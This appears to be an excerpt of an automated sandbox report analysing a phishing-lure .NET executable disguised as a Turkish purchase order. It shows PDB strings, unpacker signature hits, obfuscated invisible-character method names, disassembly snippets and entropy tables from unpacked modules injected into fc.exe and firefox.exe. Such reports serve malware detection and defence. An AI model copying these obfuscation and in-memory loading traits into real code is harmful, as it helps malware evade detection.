            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs.Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.2cdc3ac.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs.Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs.Net Code: U5x7JYn9i8 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.7160000.4.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 9.2.fc.exe.339cd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 11.0.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 11.2.akwoJPEqdiyPQmCnaGzo.exe.2c8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.3b95cd08.0.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: 0xDAD73746 [Mon May 6 15:31:18 2086 UTC]
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07183AD7 push ebx; retf 0_2_07183ADA
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040C8DF push eax; ret 3_2_0040C8E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00403180 push eax; ret 3_2_00403182
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00404A99 push FFFFFFBBh; ret 3_2_00404A9B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004203D3 push esi; iretd 3_2_004203DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0041A3FC push eax; iretd 3_2_0041A425
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00416C49 push edi; iretd 3_2_00416C4C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00414499 push esi; ret 3_2_004144CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004144A3 push esi; ret 3_2_004144CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040AE1C push 300DAF1Eh; ret 3_2_0040AE21
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040C6C5 push 0000006Eh; ret 3_2_0040C6D1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00404FCB push ds; iretd 3_2_00404FCC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C225F pushad ; ret 3_2_018C27F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C27FA pushad ; ret 3_2_018C27F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F09AD push ecx; mov dword ptr [esp], ecx3_2_018F09B6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C283D push eax; iretd 3_2_018C2858
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C1368 push eax; iretd 3_2_018C1369
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D009AD push ecx; mov dword ptr [esp], ecx9_2_02D009B6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B074C push 00000047h; retf 9_2_003B07F8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003B07D2 push 00000047h; retf 9_2_003B07F8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003AB196 push FFFFFF94h; iretd 9_2_003AB198
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003AB186 push esi; iretd 9_2_003AB187
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A7279 push eax; iretd 9_2_003A72A2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003AD250 push esi; iretd 9_2_003AD25B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003AD24A push esi; iretd 9_2_003AD25B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A1320 push esi; ret 9_2_003A134C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039D4A0 push esi; ret 9_2_0039D4AB
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_00399542 push 0000006Eh; ret 9_2_0039954E
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_00391916 push FFFFFFBBh; ret 9_2_00391918
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A3AC6 push edi; iretd 9_2_003A3AC9
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_00397C99 push 300DAF1Eh; ret 9_2_00397C9E
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: section name: .text entropy: 7.979735073551513
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.csHigh entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QqlyG2yUroCQBSjlaj.csHigh entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, lRVMMQ7c1IGVLKEkhr.csHigh entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, emyWIGHbSXMIRhxwNX.csHigh entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, GVjN9whr55tAhqTxFy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, mxTpCXNb7RZS8xnVZu.csHigh entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, idQ27mYX9UnZa99BEF.csHigh entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, YE9vLiO8DUROdAZd9B.csHigh entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, i7RJE7XwppAcletnM9.csHigh entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, PO2kQtp1JBrSKZQBcm.csHigh entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QC27IVIPJyY2iLVvXQY.csHigh entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, NLihc4KTvML7Gt74oU.csHigh entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, RZotG5zHlXj2AtOOx9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, BYAiMKsC49DgNV7vk5.csHigh entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.csHigh entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, KYYaPOIITSshMUwPMtC.csHigh entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, DUJu7MF7E5pcBffxuY.csHigh entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, QHdg36IxiiKlOn5o3Cc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, xtehnoGNiTQwATOPxp.csHigh entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, UnGAfJ2eZZ7CCMnQjv.csHigh entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.csHigh entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QqlyG2yUroCQBSjlaj.csHigh entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, lRVMMQ7c1IGVLKEkhr.csHigh entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, emyWIGHbSXMIRhxwNX.csHigh entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, GVjN9whr55tAhqTxFy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, mxTpCXNb7RZS8xnVZu.csHigh entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, idQ27mYX9UnZa99BEF.csHigh entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, YE9vLiO8DUROdAZd9B.csHigh entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, i7RJE7XwppAcletnM9.csHigh entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, PO2kQtp1JBrSKZQBcm.csHigh entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QC27IVIPJyY2iLVvXQY.csHigh entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, NLihc4KTvML7Gt74oU.csHigh entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, RZotG5zHlXj2AtOOx9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, BYAiMKsC49DgNV7vk5.csHigh entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, fOm1m09TqPZZgHoxih.csHigh entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, KYYaPOIITSshMUwPMtC.csHigh entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, DUJu7MF7E5pcBffxuY.csHigh entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, QHdg36IxiiKlOn5o3Cc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, xtehnoGNiTQwATOPxp.csHigh entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, UnGAfJ2eZZ7CCMnQjv.csHigh entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.csHigh entropy of concatenated method names: 'QwhxbngOwY', 'aBaxBJ1ibE', 'nttxOp5E0K', 'FqGxhRfVUb', 'TmPxT3j8El', 'jLvxE14j47', 'XU9xmsPQkL', 'kXtxnPdkYV', 'Efaxd52NQM', 'aMExSZUvvJ'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QqlyG2yUroCQBSjlaj.csHigh entropy of concatenated method names: 'zfghjdiOnY', 'E6xhVDEgrL', 'w8ch97R20i', 'ttWhyDZ5Ig', 'MrOhC6IHPd', 'qHUhRySn6y', 'lVoho2wYAj', 'bMVht1qCuU', 'hvhhl0WJpm', 'RnIh3j4UEI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, lRVMMQ7c1IGVLKEkhr.csHigh entropy of concatenated method names: 'm4OImOm1m0', 'hqPInZZgHo', 'cUrISoCQBS', 'AlaI6j9UJu', 'wfxICuYbmy', 'xIGIRbSXMI', 'VSGeEJGNNrNSkiAF0v', 'ePn7ufrSFdLWwdXVGL', 'UyyIIqsNWb', 'FfdIxpkoCM'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, emyWIGHbSXMIRhxwNX.csHigh entropy of concatenated method names: 'K0JEbJpOAa', 'I68EOBhJe7', 'a7eET2R2LL', 'KbrEmiYCgT', 'eCNEniD96a', 'SLxTU4T1S4', 'ydETXckRoK', 'jKoTuYEoaW', 'z3gTGcdEKg', 'KVNT5SkxFp'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, GVjN9whr55tAhqTxFy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IsD25dZcPZ', 'GVs2YcSInh', 'KRf2zYnnje', 'rW8xPLxCc3', 'pTIxIk80lA', 'FeFx29G8tV', 'YdexxDXIDn', 'bBJOiovSFxSnQBxE3bo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, mxTpCXNb7RZS8xnVZu.csHigh entropy of concatenated method names: 'srWk9NXOvo', 'rP4kyXGs4y', 'uSVkHFQXDK', 'XJ1kZSFets', 'lsik0USwnG', 'nDMkiXHwKI', 'jjlksmgv0s', 'X9gkQdVqhC', 'geIkvHIcvC', 'udYkquKlak'
